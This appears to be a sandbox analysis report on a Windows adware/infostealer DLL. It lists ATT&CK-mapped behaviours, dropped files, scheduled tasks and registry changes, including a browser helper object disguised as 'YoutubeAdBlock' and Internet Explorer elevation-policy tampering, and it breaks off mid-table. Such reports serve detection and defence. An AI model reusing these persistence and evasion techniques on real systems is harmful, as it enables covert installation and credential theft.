1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26

Analysis

max time kernel
70s
max time network
133s
platform
windows7_x64
resource
win7v20201028
submitted
08-11-2020 18:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26.dll
Size

304KB
MD5

f1e0baa123916ce237caee78536c75be
SHA1

3a24715b0a790836eb0323e0b2ee4663f8f759c2
SHA256

1a879ef8228e2134225dcdb93dad47226ea1692ff70bd7d190b6b51cb42d3e26
SHA512

721e0d3c53ba72cf9bb9470f5bad195c4d22503470ab0cf9a1019099bdc30a90451b01f2efc7e660eec0bd3114c20d44621e2ecb3148b6b5eda2c1dd14e2e849

Score

10^/10

adware discovery evasion persistence spyware stealer trojan

Malware Config

Signatures

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

5 1132 rundll32.exe
Executes dropped EXE 2 IoCs

Processes:

nPeHffteYySCvLPa.exedLVvBvq.exe

pid process

824 nPeHffteYySCvLPa.exe
1548 dLVvBvq.exe
Loads dropped DLL 2 IoCs

Processes:

rundll32.exe

pid process

1132 rundll32.exe
1132 rundll32.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
stealer adware

Modify Registry
T1112

Browser Extensions
T1176

flow	pid	process
5	1132	rundll32.exe

pid	process
824	nPeHffteYySCvLPa.exe
1548	dLVvBvq.exe

pid	process
1132	rundll32.exe
1132	rundll32.exe

Drops file in System32 directory 3 IoCs

Processes:

nPeHffteYySCvLPa.exepowershell.EXE

description	ioc	process
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	nPeHffteYySCvLPa.exe
File created	C:\Windows\system32\GroupPolicy\gpt.ini	nPeHffteYySCvLPa.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Drops file in Program Files directory 64 IoCs

Processes:

nPeHffteYySCvLPa.exe

description	ioc	process
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\hi\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\kn\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\ko\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\lv\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR\owFsSfn.dll	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\RwdvEggBBdKTLnwqUuR\HOOCTKh.xml	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\el\messages.json	nPeHffteYySCvLPa.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\omni.ja	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\en_GB\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\fa\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\fil\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\it\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\nl\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\pt_PT\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files\Mozilla Firefox\browser\features\{C69D6EEC-48CB-4724-9862-A3D0D68F7B5F}.xpi	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\YZCgqQV.exe	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\sl\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\no\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\uk\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\tQkvLX.dll	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\lt\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\es_419\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\ja\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\mr\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\pt_BR\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\da\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\ms\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\t4essNVn.dll	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\HJbvTEnmUxKU2\vlAJldP.xml	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\ml\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\Kernel.js	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\be\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\fr\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\ro\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\th\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\zh_CN\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\BsZkTgYBU\QqGRHI.dll	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\en\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\he\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\mk\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\pt\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\ru\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\sw\messages.json	nPeHffteYySCvLPa.exe
File opened for modification	C:\Program Files (x86)\IjkjItfMxIE\files\Kernel.js	nPeHffteYySCvLPa.exe
File opened for modification	C:\Program Files\Mozilla Firefox\browser\features\{C69D6EEC-48CB-4724-9862-A3D0D68F7B5F}.xpi	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\sq\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\ta\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\tr\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\BsZkTgYBU\ysWCLVm.xml	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\es\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\fi\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\hu\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\k2nAURG.dll	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\CzYifeKYfmykC\vASYnsA.xml	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\en_US\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\bn\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\bg\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\gu\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\hr\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\zh_TW\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files\Mozilla Firefox\browser\omni.ja.bak	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\ca\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\de\messages.json	nPeHffteYySCvLPa.exe
File created	C:\Program Files (x86)\IjkjItfMxIE\files\_locales\vi\messages.json	nPeHffteYySCvLPa.exe

Drops file in Windows directory 1 IoCs

Processes:

schtasks.exe

description ioc process

File created C:\Windows\Tasks\skPkswxjkHVnnFn.job schtasks.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1540 schtasks.exe
1704 schtasks.exe
904 schtasks.exe
616 schtasks.exe
1020 schtasks.exe
1852 schtasks.exe
1400 schtasks.exe
1368 schtasks.exe

description	ioc	process
File created	C:\Windows\Tasks\skPkswxjkHVnnFn.job	schtasks.exe

pid	process
1540	schtasks.exe
1704	schtasks.exe
904	schtasks.exe
616	schtasks.exe
1020	schtasks.exe
1852	schtasks.exe
1400	schtasks.exe
1368	schtasks.exe

Modifies Internet Explorer settings 1 TTPs 20 IoCs

adware spyware

Modify Registry

T1112

Processes:

nPeHffteYySCvLPa.exedLVvBvq.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\SOFTWARE\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_BROWSER_EMULATION	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\AppPath = "C:\\Program Files (x86)\\IjkjItfMxIE"	nPeHffteYySCvLPa.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\Policy = "3"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\AppName = "YZCgqQV.exe"	nPeHffteYySCvLPa.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\Policy = "3"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\AppName = "YZCgqQV.exe"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\MAIN	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Low Rights	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Approved Extensions	nPeHffteYySCvLPa.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Approved Extensions\{33594515-D1AE-4483-BD6B-76A43DEACD5D} = 51667a6c4c1d3b1b055942299b85e400a46929fb3ba08140	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	dLVvBvq.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	dLVvBvq.exe
Key deleted	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\RECOVERY\ADMINACTIVE	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\AppPath = "C:\\Program Files (x86)\\IjkjItfMxIE"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	nPeHffteYySCvLPa.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\YZCgqQV.exe = "9999"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}	nPeHffteYySCvLPa.exe

Modifies registry class 64 IoCs

Processes:

nPeHffteYySCvLPa.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}\1.0\0	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\TypeLib\Version = "1.0"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\LocalServer32	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}\1.0\HELPDIR	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\ProxyStubClsid32	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\InprocServer32\ = "C:\\Program Files (x86)\\IjkjItfMxIE\\k2nAURG.dll"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\InprocServer32\ThreadingModel = "Apartment"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719}\ProxyStubClsid	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}\1.0\FLAGS\ = "0"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9}	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9}\ProxyStubClsid32	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\TypeLib	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\Implemented Categories	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719}\ProxyStubClsid32	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEC9A981-E78E-4BF9-BDF6-4E5A7B09B99E}\1.0\FLAGS\ = "0"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719}\TypeLib\Version = "1.0"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\TypeLib\ = "{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\ProgID = "Toolbar.ExtensionHelperObject.1"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\InprocServer32	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719}\ = "{9C48BD11-7852-4EC3-BD58-3E16A1332719}"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9}\TypeLib\ = "{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\ = "IFjLfTJwTRzHZfBZPSWM"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\InprocServer32\ThreadingModel = "Apartment"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\ = "YoutubeAdBlock"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\InprocServer32\ = "C:\\Program Files (x86)\\IjkjItfMxIE\\t4essNVn.dll"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\TypeLib	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\Programmable\	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}\1.0\FLAGS	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9}\TypeLib\ = "{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719}	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEC9A981-E78E-4BF9-BDF6-4E5A7B09B99E}\1.0	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\Programmable	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEC9A981-E78E-4BF9-BDF6-4E5A7B09B99E}	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEC9A981-E78E-4BF9-BDF6-4E5A7B09B99E}\1.0\0	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719}\ProxyStubClsid\ = "{00020424-0000-0000-C000-000000000046}"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEC9A981-E78E-4BF9-BDF6-4E5A7B09B99E}\1.0\0\win32\ = "C:\\Program Files (x86)\\IjkjItfMxIE\\t4essNVn.dll"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9}\ = "_rXsfhwEGaZDTbwKYYLRIJzyfqr"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\ = "IFjLfTJwTRzHZfBZPSWM"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\Programmable\	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\Implemented Categories\{59FB2056-D625-48D0-A944-1A85B5AB2640}\	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719}	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}\1.0\0\win32	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\VersionIndependentProgID = "Toolbar.ExtensionHelperObject"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{33594515-D1AE-4483-BD6B-76A43DEACD5D}\TypeLib = "{1D5A4199-956E-49BC-B89F-6A35C57C0D13}"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9}	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{9C48BD11-7852-4EC3-BD58-3E16A1332719}\TypeLib\Version = "1.0"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEC9A981-E78E-4BF9-BDF6-4E5A7B09B99E}\1.0\0\win32	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{FEC9A981-E78E-4BF9-BDF6-4E5A7B09B99E}\1.0\0\win32\ = "C:\\Program Files (x86)\\IjkjItfMxIE\\k2nAURG.dll"	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{E7E0B905-F2A4-42B1-95A4-57E30C13F1F8}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\IjkjItfMxIE"	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{EDAADB02-90CB-4738-9EA4-18EDB4C610A9}\TypeLib	nPeHffteYySCvLPa.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{1D7769C8-AA70-44F6-B468-5D1CCB72088C}\ProxyStubClsid32	nPeHffteYySCvLPa.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{D813EB8D-26C9-49C8-A8E5-EF5C316D5B2F}\LocalServer32\ = "C:\\Program Files (x86)\\IjkjItfMxIE\\YZCgqQV.exe"	nPeHffteYySCvLPa.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

nPeHffteYySCvLPa.exe

description	ioc	process
